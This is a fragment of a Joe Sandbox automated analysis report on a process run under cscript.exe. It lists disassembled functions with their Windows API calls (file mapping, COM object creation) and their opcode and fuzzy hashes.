                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeString$ArrayDestroySafe
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4164600000-0
                                                                                                                                                                                                        • Opcode ID: fb5a40082543a661828d7f5174f772c806e808ecc7f487910fdd956538f2543f
                                                                                                                                                                                                        • Instruction ID: 859c20d385a4c0a978f8bf8cdd67a9c01129832651b18f39bded71179d752d67
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb5a40082543a661828d7f5174f772c806e808ecc7f487910fdd956538f2543f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 082178746013049FC7209F25C98896BBBF5EF44314B10893EE146A3BA0CB7AAC908B4E
                                                                                                                                                                                                        Function 0040B580 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileSize.KERNEL32(0040B2EA,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000,00000000), ref: 0040B595
                                                                                                                                                                                                        • CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B5B6
                                                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000), ref: 0040B5D0
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0040B55F,00000000,?,?,0040B2EA,?,?,?,?,00000000,00000000), ref: 0041142A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CreateErrorLastMappingSizeView
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2735091159-0
                                                                                                                                                                                                        • Opcode ID: 2a270477d37feb6e52a06446fbc4b38a28089576a3faf3db235db5bc9ea5fa25
                                                                                                                                                                                                        • Instruction ID: 335535d9dd9c9da26fd3cf063ae7c58b78333c34cbbc4b1effd1684dbde355c0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270477d37feb6e52a06446fbc4b38a28089576a3faf3db235db5bc9ea5fa25
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9701A270240302BBE7315F355C09B633AD8AF04B24F348536BA69EA2E0E778D840865D
                                                                                                                                                                                                        Function 0040C587 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68comCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,0040C4E7,?,?,?), ref: 0040C598
                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000015,00403BD4,?,?,?,?,0040C4E7,?,?,?), ref: 0040C5DE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFromInstanceProg
                                                                                                                                                                                                        • String ID: WScript.CreateObject
                                                                                                                                                                                                        • API String ID: 2151042543-1366894974
                                                                                                                                                                                                        • Opcode ID: 11d3d9c023eeee9982fad9a7084628a278bf828477aace24ed8a35ee9f01e2dc
                                                                                                                                                                                                        • Instruction ID: a27e67cd8e0b5ad0e74c67875404ead7e93307e6018bca0f301cabab1be30e23
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11d3d9c023eeee9982fad9a7084628a278bf828477aace24ed8a35ee9f01e2dc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4112736A40229FBDB116B408C06FDD7A21EB40755F218237FF00761D1D6B9AE91E78D